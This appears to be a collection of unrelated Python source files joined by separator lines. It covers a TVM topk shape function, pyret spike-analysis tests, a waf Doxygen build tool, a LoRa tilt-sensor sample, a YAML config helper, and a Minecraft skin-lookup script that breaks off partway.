        # Delegates to the admin client set up by KeycloakBaseAction;
        # API errors propagate to the action runner.
        self.keycloak_admin.delete_client_role(role_name=role_name)
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"Definition of classic algorithms"
# pylint: disable=invalid-name,unused-argument
from __future__ import absolute_import
from tvm.te.hybrid import script
from tvm.runtime import convert
from .. import strategy
from .. import op as _reg
from ..op import OpPattern, register_pattern
from ..op import register_strategy
# topk
# Register the compute/schedule strategy for dyn.topk and mark the op
# OPAQUE so the fusion pass leaves it alone.
register_strategy("dyn.topk", strategy.topk_strategy)
register_pattern("dyn.topk", OpPattern.OPAQUE)
@script
def _topk_shape_func_input_data(data, k, axis):
    # Hybrid-script shape function for dyn.topk: computes the output shapes
    # of both the values and indices tensors. Along `axis` the extent
    # becomes k[0]; k[0] < 1 means "keep everything" (extent unchanged).
    ndim = len(data.shape)
    val_out = output_tensor((ndim,), "int64")
    indices_out = output_tensor((ndim,), "int64")
    for i in const_range(ndim):
        if i != axis:
            # non-reduced axes keep their input extent
            val_out[i] = int64(data.shape[i])
            indices_out[i] = int64(data.shape[i])
        else:
            if k[0] < 1:
                val_out[i] = int64(data.shape[i])
                indices_out[i] = int64(data.shape[i])
            else:
                val_out[i] = int64(k[0])
                indices_out[i] = int64(k[0])
    return val_out, indices_out
@_reg.register_shape_func("dyn.topk", True)
def topk_shape_func(attrs, inputs, _):
    """
    Shape func for topk.

    Normalizes a negative axis, delegates the per-axis computation to the
    hybrid script above, then returns the output list selected by ret_type.
    """
    axis = attrs.axis
    if axis < 0:
        axis += len(inputs[0].shape)
    val_out, indices_out = _topk_shape_func_input_data(
        inputs[0], inputs[1], convert(axis))
    ret_type = attrs.ret_type
    if ret_type == "both":
        return [val_out, indices_out]
    if ret_type == "values":
        return [val_out]
    return [indices_out]
|
class Reference():
    """Container pairing reference metadata with named Figure objects.

    Each figure in *figures* is exposed as an attribute on the instance,
    keyed by its ``name``.
    """
    def __init__(self, metadata: dict, figures: list):
        # Copy into a per-instance dict. The previous implementation
        # .update()d a class-level dict, so metadata from every instance
        # leaked into every other instance.
        self.metadata = dict(metadata)
        for fig in figures:
            setattr(self, fig.name, fig)
class Figure():
    """
    This is the base class for figure data.
    """
    def __init__(self, name: str, lines: list):
        # Identifier used by Reference to expose this figure as an attribute.
        self.name = name
        # Sequence of Line objects holding the plotted series.
        self.lines = lines
class Line():
    """A single plotted series: x/y data plus a legend label."""
    def __init__(self, x, y, label):
        self.x = x
        self.y = y
        self.label = label
"""test_filtertools.py
Test code for pyret's filtertools module.
(C) 2016 The Baccus Lab.
"""
import numpy as np
import pytest
from pyret import filtertools as flt
from pyret.stimulustools import slicestim
import utils
def test_ste():
    """Test computing a spike-triggered ensemble."""
    np.random.seed(0)
    time = np.arange(100)
    spikes = np.array((30, 70))
    stimulus = np.random.randn(100,)
    filter_length = 5
    ste = flt.ste(time, stimulus, spikes, filter_length)
    # The ensemble generator should yield, for each spike, the stimulus
    # window of `filter_length` samples immediately preceding that spike.
    for ix in spikes:
        assert np.allclose(stimulus[ix - filter_length : ix], next(ste))
def test_sta():
    """Test computing a spike-triggered average."""
    np.random.seed(0)
    time = np.arange(100)
    spikes = np.array((0, 30, 70))
    stimulus = np.random.randn(100,)
    filter_length = 5
    sta, tax = flt.sta(time, stimulus, spikes, filter_length)
    tmp = np.zeros(sta.shape)
    for ix in spikes[1:]: # Should ignore first spike, comes before filter_length frames
        tmp += stimulus[ix - filter_length : ix]
    tmp /= len(spikes)  # normalized by total spike count, ignored spike included
    assert np.allclose(tmp, sta)
    # time axis runs from -(filter_length - 1) up to 0 (the spike time)
    assert np.allclose(tax, np.arange(-filter_length + 1, 1))
def test_sta_acausal():
    """Test computing a spike-triggered average with points before and
    after the time of the spike.
    """
    np.random.seed(0)
    time = np.arange(100)
    spikes = np.array((0, 30, 70))
    stimulus = np.random.randn(100,)
    nbefore, nafter = 5, 2
    sta, tax = flt.sta(time, stimulus, spikes, nbefore, nafter)
    tmp = np.zeros(sta.shape)
    for ix in spikes[1:]: # Should ignore first spike, comes before filter_length frames
        tmp += stimulus[ix - nbefore : ix + nafter]
    tmp /= len(spikes)  # normalized by total spike count, ignored spike included
    assert np.allclose(tmp, sta)
    # time axis spans the nbefore-1 points before the spike through nafter after
    assert np.allclose(tax, np.arange(-nbefore + 1, nafter + 1))
def test_empty_sta():
    """Test that an STA computed with no spikes returns an array of NaNs."""
    np.random.seed(0)
    time = np.arange(100)
    spikes = np.array(())
    stimulus = np.random.randn(100,)
    filter_length = 5
    sta, _ = flt.sta(time, stimulus, spikes, filter_length)
    # with nothing to average, every element should be NaN
    assert np.all(np.isnan(sta))
def test_stc():
    """Test computation of a spike-triggered covariance matrix."""
    np.random.seed(0)
    # random spike times and white noise stimulus, so STC should be close to identity
    npoints = 100000
    nspikes = 1000
    time = np.arange(npoints)
    spikes = np.random.randint(0, npoints, (nspikes,))
    stimulus = np.random.randn(npoints,)
    filter_length = 10
    tmp = flt.stc(time, stimulus, spikes, filter_length)
    # loose tolerance: 1000 spikes only approximate the identity covariance
    atol = 0.1
    assert np.allclose(tmp, np.eye(filter_length), atol=atol)
def test_empty_stc():
    """Test STC with no spikes returns an array of NaNs."""
    np.random.seed(0)
    # zero spikes: the covariance is undefined, so the result must be all NaN
    npoints = 100
    nspikes = 0
    time = np.arange(npoints)
    spikes = np.random.randint(0, npoints, (nspikes,))
    stimulus = np.random.randn(npoints,)
    filter_length = 10
    tmp = flt.stc(time, stimulus, spikes, filter_length)
    assert np.all(np.isnan(tmp))
def test_decompose_2d():
    """Tests computing a rank-1 approximation to a 2D filter.
    Note that this tests both ``filtertools.decompose()`` and
    ``filtertools.lowranksta()``.
    """
    np.random.seed(0)
    filter_length = 50
    nx = 10
    def gaussian(x, mu, sigma):
        # Gaussian bump used to build a separable (rank-1) filter
        return np.exp(-((x - mu) / sigma)**2) / np.sqrt(sigma * 2 * np.pi)
    temporal = gaussian(np.linspace(-3, 3, filter_length), -1, 1.5)
    spatial = gaussian(np.linspace(-3, 3, nx), 0, 1.0)
    # outer product gives an exactly rank-1 spatiotemporal filter, plus noise
    true_filter = np.outer(temporal, spatial)
    noise_std = 0.01 * (temporal.max() - temporal.min())
    true_filter += np.random.randn(*true_filter.shape) * noise_std
    s, t = flt.decompose(true_filter)
    # s/t are unit vectors, scale them and the inputs
    s -= s.min()
    s /= s.max()
    t -= t.min()
    t /= t.max()
    temporal -= temporal.min()
    temporal /= temporal.max()
    spatial -= spatial.min()
    spatial /= spatial.max()
    tol = 0.1
    assert np.allclose(temporal, t, atol=tol)
    assert np.allclose(spatial, s, atol=tol)
def test_decompose_3d():
    """Tests computing a rank-1 approximation to a 3D filter.
    Note that this tests both ``filtertools.decompose()`` and
    ``filtertools.lowranksta()``.
    """
    np.random.seed(0)
    filter_length = 50
    nx, ny = 10, 10
    def gaussian(x, mu, sigma):
        # Gaussian bump used to build a separable (rank-1) filter
        return np.exp(-((x - mu) / sigma)**2) / np.sqrt(sigma * 2 * np.pi)
    temporal = gaussian(np.linspace(-3, 3, filter_length), -1, 1.5)
    spatial = gaussian(np.linspace(-3, 3, nx * ny), 0, 1.0).reshape(nx, ny)
    # outer product with the flattened spatial profile: rank-1 plus noise
    true_filter = np.outer(temporal, spatial.ravel())
    noise_std = 0.01 * (temporal.max() - temporal.min())
    true_filter += np.random.randn(*true_filter.shape) * noise_std
    s, t = flt.decompose(true_filter)
    # s/t are unit vectors, scale them and the inputs
    s -= s.min()
    s /= s.max()
    t -= t.min()
    t /= t.max()
    temporal -= temporal.min()
    temporal /= temporal.max()
    spatial -= spatial.min()
    spatial /= spatial.max()
    tol = 0.1
    assert np.allclose(temporal, t, atol=tol)
    assert np.allclose(spatial.ravel(), s.ravel(), atol=tol)
def test_filterpeak():
    """Test finding the maximal point in a 3D filter"""
    arr = np.zeros((5, 2, 2))
    true_index = 7
    # the peak value is negative: filterpeak is expected to locate it anyway
    arr.flat[true_index] = -1
    true_indices = np.unravel_index(true_index, arr.shape)
    idx, sidx, tidx = flt.filterpeak(arr)
    assert true_index == idx
    # first axis is time, remaining axes are space
    assert true_indices[0] == tidx
    assert np.all(true_indices[1:] == sidx)
def test_cutout():
    """Test cutting out a small tube through a 3D spatiotemporal filter"""
    np.random.seed(0)
    chunk = np.random.randn(4, 2, 2)
    # pad spatially with zeros; cutting at the center should recover `chunk`
    arr = np.pad(chunk, ((0, 0), (1, 1), (1, 1)), 'constant', constant_values=0)
    cutout = flt.cutout(arr, (2, 2), width=1)
    assert np.allclose(cutout, chunk)
def test_cutout_peak():
    """Test that the `filtertools.cutout()` method correctly
    uses the filter peak."""
    chunk = np.zeros((4, 2, 2))
    # single nonzero entry marks the peak location
    chunk[2, 1, 1] = 1
    arr = np.pad(chunk, ((0, 0), (1, 1), (1, 1)),
            'constant', constant_values=0)
    # no index given: cutout must locate the peak itself
    cutout = flt.cutout(arr, width=1)
    assert np.allclose(cutout, chunk)
def test_cutout_raises():
    """Test cutout() raises an exception when the index argument
    does not have two elements."""
    # a 1-element index cannot address the two spatial dimensions
    with pytest.raises(ValueError):
        flt.cutout(np.zeros((10, 10, 10)), (1,))
def test_resample():
    """Test resampling a 1 or 2D array."""
    np.random.seed(0)
    size = 100
    arr = np.random.randn(size)
    scale = 10
    up = flt.resample(arr, scale)
    # every scale-th sample of the upsampled array should hit the original
    assert np.allclose(up[::scale], arr)
    # Compare low-frequency spectral content of the original and upsampled
    # arrays. Fourier amplitudes grow with the number of samples, so the
    # original spectrum is scaled by `scale` (by `scale**2` in 2D below).
    # Fixed: the previous code computed `up_power` from `arr` instead of
    # `up`, comparing the original spectrum to itself (a vacuous check).
    orig_power = np.absolute(np.fft.fft(arr)) * scale
    up_power = np.absolute(np.fft.fft(up))
    assert np.allclose(orig_power[: int(size / 2)], up_power[: int(size / 2)])
    arr = np.random.randn(size, size)
    up = flt.resample(arr, scale)
    assert np.allclose(up[::scale, ::scale], arr)
    orig_power = np.absolute(np.fft.fft2(arr)) * scale**2
    up_power = np.absolute(np.fft.fft2(up))
    assert np.allclose(orig_power[:int(size / 2), :int(size / 2)],
            up_power[:int(size / 2), :int(size / 2)])
def test_normalize_spatial():
    """Test normalizing a noisy filter."""
    np.random.seed(0)
    nx, ny = 10, 10
    shape = (nx, ny)
    true_filter = np.random.randn(*shape)
    # small additive noise: normalization should still recover the filter
    noise_std = 0.01
    noisy_filter = true_filter + 1.0 * np.random.randn(*shape) * noise_std
    normalized = flt.normalize_spatial(noisy_filter)
    atol = 0.1
    assert np.allclose(normalized, true_filter, atol=atol)
def test_rfsize():
    """Test estimating the receptive-field size of a Gaussian spatial filter."""
    np.random.seed(0)
    nx, ny = 10, 10
    from pyret.filtertools import _gaussian_function
    x, y = np.meshgrid(np.linspace(-3, 3, nx), np.linspace(-3, 3, ny))
    points = np.stack((x.ravel(), y.ravel()), axis=0)
    # unit-variance Gaussian centered at the origin
    true_filter = _gaussian_function(points, 0, 0, 1, 0, 1).reshape(nx, ny)
    xsize, ysize = flt.rfsize(true_filter, 1., 1.)
    assert np.allclose(xsize, 4, 0.1) # 2SDs on either side == RF size
    assert np.allclose(ysize, 4., 0.1)
def test_linear_response_1d():
    """Test method for computing linear response from a
    filter to a one-dimensional stimulus. The linear response of the
    filter to an impulse should return the filter itself.
    """
    filt = np.array(((1, 0, 0)))
    stim = np.concatenate(((1,), np.zeros((10,))), axis=0)
    pred = flt.linear_response(filt, stim) # Impulse response is linear filter
    assert np.allclose(pred[:filt.size], filt)
    # beyond the filter's support the response must be zero
    assert np.allclose(pred[filt.size:], np.zeros_like(pred[filt.size:]))
def test_linear_response_acausal():
    """Test computing a linear response from a filter to a 1D stimulus,
    including acausal portions of the stimulus. The linear response of
    the filter to an impulse should return the filter itself, plus
    zeros at any acausal time points.
    """
    nacausal_points = 1
    # filter: one acausal zero sample followed by the causal taps (1, 0, 0)
    filt = np.concatenate((np.zeros((nacausal_points,)), (1, 0, 0)), axis=0)
    stim = np.concatenate(((1,), np.zeros((10,))), axis=0)
    pred = flt.linear_response(filt, stim, nacausal_points)
    # the causal part of the filter appears at the start of the prediction
    assert np.allclose(pred[:filt.size - nacausal_points],
            filt[nacausal_points:])
    assert np.allclose(pred[filt.size:], np.zeros_like(pred[filt.size:]))
def test_linear_response_only_acausal():
    """Test that calling ``linear_response`` with only acausal
    points is invalid.
    """
    # nsamples_after equals the filter length, leaving no causal samples
    with pytest.raises(ValueError):
        flt.linear_response(np.zeros((3,)), np.zeros((10,)),
                nsamples_after=3)
def test_linear_response_nd():
    """Test method for computing linear response from a
    filter to a multi-dimensional stimulus. The linear response of
    the filter to an impulse (1 at first time point in all spatial dimensions)
    should return the filter itself, scaled by the number of spatial points.
    """
    for ndim in range(2, 4):
        # filter and stimulus each have `ndim` spatial axes of size 2
        filt = np.zeros((3,) + ((2,) * ndim))
        filt[0] = 1.
        stim = np.zeros((10,) + ((2,) * ndim))
        stim[0] = 1.
        pred = flt.linear_response(filt, stim)
        # impulse response sums the filter over all spatial points
        assert np.allclose(pred[0], filt[0].sum())
        assert np.allclose(pred[1:], np.zeros_like(pred[1:]))
def test_linear_response_raises():
    """Test raising ValueErrors with incorrect inputs"""
    # filter and stimulus dimensionality must agree
    with pytest.raises(ValueError):
        flt.linear_response(np.zeros((10,)), np.zeros((10,2)))
    # spatial shapes must agree as well
    with pytest.raises(ValueError):
        flt.linear_response(np.zeros((10, 2)), np.zeros((10, 3)))
def test_revcorr_raises():
    """Test raising ValueErrors with incorrect inputs"""
    # stimulus and response lengths differ (10 vs 11)
    with pytest.raises(ValueError):
        flt.revcorr(np.zeros((10, 1)), np.zeros((11,)), 2)[0]
    # stimulus and response shapes are incompatible
    with pytest.raises(ValueError):
        flt.revcorr(np.zeros((10, 3)), np.zeros((10, 2)), 2)[0]
def test_revcorr_1d_ignores_beginning():
    """Verify revcorr ignores the first filter-length points of the stimulus,
    to only consider those points which the response and stimulus overlap
    completely.
    """
    filt = np.array(((1, 0, 0)))
    # impulse at time 0: its response falls entirely in the ignored region
    stim = np.concatenate(((1,), np.zeros((10,))), axis=0)
    response = np.convolve(filt, stim, 'full')[:stim.size]
    recovered, lags = flt.revcorr(stim, response, filt.size)
    assert np.allclose(recovered, 0)
def test_revcorr_1d():
    """Test computation of 1D reverse correlation.
    The reverse-correlation should recover the time-reverse of the
    linear filter, and the lags should be start at negative values
    and be strictly increasing.
    """
    filt = np.array(((1, 0, 0)))
    # impulse placed mid-stimulus so the full response is observable
    stim = np.zeros((10,))
    stim[5] = 1
    response = np.convolve(filt, stim, 'full')[:stim.size]
    recovered, lags = flt.revcorr(stim, response, filt.size)
    assert np.allclose(recovered, filt[::-1])
    # lags start at -(filter_length - 1) and increase by exactly 1
    assert lags[0] == -(filt.size - 1)
    assert (np.diff(lags) == 1).all()
def test_revcorr_acausal():
    """Test computation of a 1D linear filter by reverse correlation,
    including acausal lag values. The reverse-correlation should recover
    the time-reverse of the linear filter.
    """
    filt = np.array(((1, 0, 0)))
    stim = np.zeros((10,))
    stim[5] = 1.0
    response = np.convolve(filt, stim, 'full')[:stim.size]
    nsamples_after = 2
    recovered, lags = flt.revcorr(stim, response, filt.size, nsamples_after)
    assert np.allclose(recovered[nsamples_after:], filt[::-1])
    # NOTE(review): this slice overlaps the one above; [:nsamples_after] was
    # probably intended (it passes either way since filt[::-1] starts with 0).
    assert np.allclose(recovered[:filt.size], 0)
    assert lags[0] == -(filt.size - 1)
    assert lags[-1] == nsamples_after
    assert (np.diff(lags) == 1).all()
def test_revcorr_nd():
    """Test computation of 3D linear filter by reverse correlation.
    The reverse correlation should return the time-reverse of the
    linear filter, scaled by the number of spatial points.
    """
    ndim = 3
    filt = np.zeros((3,) + ((2,) * ndim))
    filt[0] = 1.
    stim = np.zeros((10,) + ((2,) * ndim))
    stim[5] = 1.
    # use the forward model to generate the response, then invert it
    response = flt.linear_response(filt, stim)
    recovered, lags = flt.revcorr(stim, response, filt.shape[0])
    # time-reversal puts the filter's first frame at the last lag
    assert np.allclose(recovered[-1], filt[0].sum())
    assert np.allclose(recovered[:-1], 0)
|
from PyQt5 import QtCore, QtWidgets
from PyQt5.QtWidgets import *
from PyQt5.QtGui import *
from wired_module import *
# Generated By WiredQT for Python: by Rocky Nuarin, 2021 Phils
class Handler(QtWidgets.QWidget,usercontrol):
    # Main WiredQT-generated window: builds the UI, then drives an update
    # callback from a 10 ms QTimer alongside a 500 ms Scheduler.
    def __init__(self, *param):
        super(Handler, self).__init__(None)
        # initUI and GTKForms come from the generated wired_module helpers
        initUI(self,param,w=1366,h=768,title="WiredQT v1.0",controlbox=True,startpos=(0,30),timeoutdestroy=-1)
        self.GTKForms()
        self.timer=QtCore.QTimer()
        # NOTE(review): `self.loop` is not defined in this class; presumably
        # supplied by usercontrol / the generated code -- verify.
        self.timer.timeout.connect(self.loop)
        self.timer.start(10)
        self.sch=Scheduler(500)#500 ms
        self.sch.Start()
|
#!/usr/bin/env python3
#This sample demonstrates detecting tilt without using the I2C bus.
#Install LoRa HAT library with "pip3 install turta-lorahat"
from time import sleep
from turta_lorahat import Turta_Accel
#Initialize the tilt-sensor wrapper
accel = Turta_Accel.AccelTiltSensor()

try:
    while True:
        #Read all three tilt states in one shot
        tilt_xyz = accel.read_tilt_xyz()
        #Report each axis, keeping the original output format byte-for-byte
        for axis_name, tilted in zip(("X", "Y", "Z"), tilt_xyz):
            state = "Tilt detected." if tilted else "No tilt."
            print(axis_name + "-Tilt..........: " + state)
        #Wait before the next poll
        print("-----")
        sleep(0.5)
#Exit on CTRL+C
except KeyboardInterrupt:
    print('Bye.')
|
# Copyright 2018 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ruamel.yaml import YAML
class Config:
    """Thin wrapper around a YAML configuration file (ruamel.yaml).

    Loads the document on construction and can persist an updated
    folder list back to the same file.
    """
    yaml = YAML()

    def __init__(self, path):
        """Load the YAML document found at *path*."""
        self.path = path
        # Context manager ensures the handle is closed even if parsing fails
        # (the previous open/read/close leaked the handle on error).
        with open(path, "r") as f:
            self.configs = self.yaml.load(f.read())

    def update_folders(self, folders):
        """Cache *folders* under 'folders_list_cache' and write the file."""
        self.configs['folders_list_cache'] = folders
        # Fixed: `print 'lets write'` was Python-2 syntax and a SyntaxError
        # on Python 3; kept as a function call to preserve the debug output.
        print('lets write')
        with open(self.path, 'w') as yf:
            self.yaml.dump(self.configs, stream=yf)
|
#! /usr/bin/env python
# encoding: UTF-8
# Thomas Nagy 2008-2010 (ita)
"""
Doxygen support
Variables passed to bld():
* doxyfile -- the Doxyfile to use
When using this tool, the wscript will look like:
def options(opt):
opt.load('doxygen')
def configure(conf):
conf.load('doxygen')
# check conf.env.DOXYGEN, if it is mandatory
def build(bld):
if bld.env.DOXYGEN:
bld(features="doxygen", doxyfile='Doxyfile', ...)
def doxygen(bld):
if bld.env.DOXYGEN:
bld(features="doxygen", doxyfile='Doxyfile', ...)
"""
from fnmatch import fnmatchcase
import os, os.path, re, stat
from waflib import Task, Utils, Node, Logs, Errors, Build
from waflib.TaskGen import feature
DOXY_STR = '"${DOXYGEN}" - '
# Output formats doxygen can emit.
# NOTE(review): 'rft' is kept as-is from upstream waf but is presumably a
# typo for 'rtf' -- confirm before relying on it (unused in this chunk).
DOXY_FMTS = 'html latex man rft xml'.split()
# Default FILE_PATTERNS ('*.c *.cc ...') used when the Doxyfile defines none.
# Fixed: the extension list had been garbled -- 'f90' was fused with a
# duplicated copy of the first line ('f90c cc cxx ...'), so '*.f90' never
# matched and many extensions appeared twice.
DOXY_FILE_PATTERNS = '*.' + ' *.'.join('''
c cc cxx cpp c++ java ii ixx ipp i++ inl h hh hxx hpp h++ idl odl cs php php3
inc m mm py f90
'''.split())
# Doxyfile values may continue over a trailing backslash; re_rl splices such
# continuation lines, re_nl then splits the result into individual lines.
re_rl = re.compile('\\\\\r*\n', re.MULTILINE)
re_nl = re.compile('\r*\n', re.M)
def parse_doxy(txt):
    """Parse Doxyfile text into a {KEY: value} dict.

    Handles backslash line continuations, '#' comments, and the '+='
    append operator (appended values are joined with spaces).
    """
    tbl = {}
    txt = re_rl.sub('', txt)
    lines = re_nl.split(txt)
    for x in lines:
        x = x.strip()
        # skip blanks, comments and lines without an assignment
        if not x or x.startswith('#') or x.find('=') < 0:
            continue
        if x.find('+=') >= 0:
            tmp = x.split('+=')
            key = tmp[0].strip()
            if key in tbl:
                tbl[key] += ' ' + '+='.join(tmp[1:]).strip()
            else:
                tbl[key] = '+='.join(tmp[1:]).strip()
        else:
            tmp = x.split('=')
            tbl[tmp[0].strip()] = '='.join(tmp[1:]).strip()
    return tbl
class doxygen(Task.Task):
    """Runs doxygen on a Doxyfile, piping the (possibly overridden)
    configuration to ``doxygen -`` on stdin."""
    vars = ['DOXYGEN', 'DOXYFLAGS']
    color = 'BLUE'

    def runnable_status(self):
        '''
        self.pars are populated in runnable_status - because this function is being
        run *before* both self.pars "consumers" - scan() and run()
        set output_dir (node) for the output
        '''
        for x in self.run_after:
            if not x.hasrun:
                return Task.ASK_LATER

        if not getattr(self, 'pars', None):
            txt = self.inputs[0].read()
            self.pars = parse_doxy(txt)
            if not self.pars.get('OUTPUT_DIRECTORY'):
                # default the output next to the Doxyfile, in the build tree
                self.pars['OUTPUT_DIRECTORY'] = self.inputs[0].parent.get_bld().abspath()

            # Override with any parameters passed to the task generator.
            if getattr(self.generator, 'pars', None):
                # Fixed: dict.iteritems() is Python 2 only and raised
                # AttributeError on Python 3; items() works on both.
                for k, v in self.generator.pars.items():
                    self.pars[k] = v

            self.doxy_inputs = getattr(self, 'doxy_inputs', [])
            if not self.pars.get('INPUT'):
                self.doxy_inputs.append(self.inputs[0].parent)
            else:
                for i in self.pars.get('INPUT').split():
                    if os.path.isabs(i):
                        node = self.generator.bld.root.find_node(i)
                    else:
                        node = self.generator.path.find_node(i)
                    if not node:
                        self.generator.bld.fatal('Could not find the doxygen input %r' % i)
                    self.doxy_inputs.append(node)

        if not getattr(self, 'output_dir', None):
            bld = self.generator.bld
            # First try to find an absolute path, then find or declare a relative path
            self.output_dir = bld.root.find_dir(self.pars['OUTPUT_DIRECTORY'])
            if not self.output_dir:
                self.output_dir = bld.path.find_or_declare(self.pars['OUTPUT_DIRECTORY'])

        self.signature()
        return Task.Task.runnable_status(self)

    def scan(self):
        """Implicit dependencies: all files matched by FILE_PATTERNS
        (honouring RECURSIVE and EXCLUDE_PATTERNS) under the INPUT nodes."""
        exclude_patterns = self.pars.get('EXCLUDE_PATTERNS','').split()
        file_patterns = self.pars.get('FILE_PATTERNS','').split()
        if not file_patterns:
            file_patterns = DOXY_FILE_PATTERNS
        if self.pars.get('RECURSIVE') == 'YES':
            file_patterns = ["**/%s" % pattern for pattern in file_patterns]
        nodes = []
        names = []
        for node in self.doxy_inputs:
            if os.path.isdir(node.abspath()):
                for m in node.ant_glob(incl=file_patterns, excl=exclude_patterns):
                    nodes.append(m)
            else:
                nodes.append(node)
        return (nodes, names)

    def run(self):
        """Feed the effective configuration to 'doxygen -' and wait for it."""
        dct = self.pars.copy()
        dct['INPUT'] = ' '.join(['"%s"' % x.abspath() for x in self.doxy_inputs])
        # NOTE(review): the emitted config iterates self.pars, so the INPUT
        # injected into dct above is dropped when the Doxyfile had no INPUT
        # key -- confirm against upstream waf before changing.
        code = '\n'.join(['%s = %s' % (x, dct[x]) for x in self.pars])
        code = code.encode() # for python 3
        #fmt = DOXY_STR % (self.inputs[0].parent.abspath())
        cmd = Utils.subst_vars(DOXY_STR, self.env)
        env = self.env.env or None
        proc = Utils.subprocess.Popen(cmd, shell=True, stdin=Utils.subprocess.PIPE, env=env, cwd=self.generator.bld.path.get_bld().abspath())
        proc.communicate(code)
        return proc.returncode

    def post_run(self):
        # Everything doxygen wrote becomes an output node with a signature,
        # so the results participate in the build's dependency tracking.
        nodes = self.output_dir.ant_glob('**/*', quiet=True)
        for x in nodes:
            x.sig = Utils.h_file(x.abspath())
        self.outputs += nodes
        return Task.Task.post_run(self)
class tar(Task.Task):
    "quick tar creation"
    run_str = '${TAR} ${TAROPTS} ${TGT} ${SRC}'
    color = 'RED'
    after = ['doxygen']
    def runnable_status(self):
        # wait for the doxygen task(s) whose outputs we will archive
        for x in getattr(self, 'input_tasks', []):
            if not x.hasrun:
                return Task.ASK_LATER
        if not getattr(self, 'tar_done_adding', None):
            # execute this only once
            self.tar_done_adding = True
            # adopt the producing tasks' outputs as this task's inputs
            for x in getattr(self, 'input_tasks', []):
                self.set_inputs(x.outputs)
            if not self.inputs:
                return Task.SKIP_ME
        return Task.Task.runnable_status(self)
    def __str__(self):
        # display the archive target(s) when the task is printed
        tgt_str = ' '.join([a.nice_path(self.env) for a in self.outputs])
        return '%s: %s\n' % (self.__class__.__name__, tgt_str)
@feature('doxygen')
def process_doxy(self):
    """Task-generator method: create a doxygen task for `doxyfile`, and
    optionally a tar task archiving its output when `doxy_tar` is set."""
    if not getattr(self, 'doxyfile', None):
        self.generator.bld.fatal('no doxyfile??')
    node = self.doxyfile
    if not isinstance(node, Node.Node):
        # a plain string: resolve it relative to this task generator's path
        node = self.path.find_resource(node)
    if not node:
        raise ValueError('doxygen file not found')
    # the task instance
    dsk = self.create_task('doxygen', node)
    if getattr(self, 'doxy_tar', None):
        tsk = self.create_task('tar')
        tsk.input_tasks = [dsk]
        tsk.set_outputs(self.path.find_or_declare(self.doxy_tar))
        # choose tar compression flags from the archive file extension
        if self.doxy_tar.endswith('bz2'):
            tsk.env['TAROPTS'] = ['cjf']
        elif self.doxy_tar.endswith('gz'):
            tsk.env['TAROPTS'] = ['czf']
        else:
            tsk.env['TAROPTS'] = ['cf']
def configure(conf):
    '''
    Check if doxygen and tar commands are present in the system
    If the commands are present, then conf.env.DOXYGEN and conf.env.TAR
    variables will be set. Detection can be controlled by setting DOXYGEN and
    TAR environmental variables.
    '''
    print('Doxygen documentation tools:')
    conf.find_program('doxygen', var='DOXYGEN', mandatory=False)
    # NOTE(review): 'dot' is mandatory (configure fails without Graphviz),
    # which contradicts the best-effort detection above -- confirm intent.
    conf.find_program('dot', var='dot', mandatory=True)
    conf.find_program('tar', var='TAR', mandatory=False)
    if Utils.unversioned_sys_platform()=='win32':
        # fall back to the tar bundled with Git for Windows
        path_list = [os.path.join('C:', os.sep, 'Program Files', 'Git', 'usr', 'bin')]
        Logs.debug('Did not find native tar, searching for git tar...')
        conf.find_program('tar', var='TAR', path_list=path_list, mandatory=False)
# doxygen docs
from waflib.Build import BuildContext
class doxy(BuildContext):
    # Adds a `waf doxygen` command that runs the wscript's `doxygen` function.
    __doc__ = '''creates doxygen documentation''' # foxbms
    cmd = "doxygen"
    fun = "doxygen"
|
from context import search
import unittest
class BasicTestSuite(unittest.TestCase):
    """Basic Search tests against a simple and a complex corpus."""
    global isf
    global corpus
    global corpus_complex
    corpus = 'The quick brown fox jumped over the lazy dog'
    corpus_complex = 'When in the Course of human events, it becomes necessary for one people to dissolve the political bands which have connected them with another, and to assume among the powers of the earth, the separate and equal station to which the Laws of Nature and of Nature\'s God entitle them, a decent respect to the opinions of mankind requires that they should declare the causes which impel them to the separation'
    isf = search.Search()
    def test_searchSimple(self):
        result = isf.searchSimple(corpus, 'brown')
        # Fixed: assertTrue(result, True) passed True as the failure
        # *message*; the intended check is simply that a match was found.
        self.assertTrue(result)
    def test_forward_searchJoint(self):
        # forward ('1') joint search: both words within a 5-word window
        result = isf.searchJoint(corpus_complex, 'decent', 'respect', '1', 5)
        self.assertEqual(result, 5)
    def test_twoway_searchJoint(self):
        result = isf.searchJoint(corpus_complex, 'respect', 'decent', '2', 5)
        # TODO(review): this test asserts nothing -- decide the expected
        # value for a two-way ('2') joint search and assert it here.
if __name__ == '__main__':
    # Run the suite when the file is executed directly.
    unittest.main()
|
# Author: Github@layou233
# Rewritten in Python from the original mcsg.js script
import base64, json, webbrowser
from urllib import request
def getUuid(playerName):
    """Look up the UUID for a Minecraft player name via the Mojang API."""
    url="https://api.mojang.com/users/profiles/minecraft/"+playerName #Mojang API
    return json.loads(request.urlopen(url).read().decode("utf-8"))["id"]
def getSkinUrl(uuid):
    """Resolve the skin texture URL for a UUID via the Mojang session API.

    The profile's base64-encoded 'textures' property is decoded and the
    SKIN entry's url extracted.
    """
    url="https://sessionserver.mojang.com/session/minecraft/profile/"+uuid #Mojang API
    return json.loads(base64.b64decode(json.loads(request.urlopen(url).read().decode("utf-8"))["properties"][0]["value"]).decode("utf-8"))["textures"]["SKIN"]["url"]
# Ask the user to choose a mode: 1 = look up by player name, 2 = by UUID.
if input('请选择模式(输入序号):\n1 - 通过游戏ID获取皮肤\n2 - 通过UUID获取皮肤\n') == "1":
    q="游戏ID"  # lookup key label: player name ("game ID")
else:
    q="UUID"
i=input('请输入'+q+'\n')  # prompt for the chosen identifier
if q == "游戏ID":
    sign=getUuid(i)  # resolve the player name to a UUID first
else:
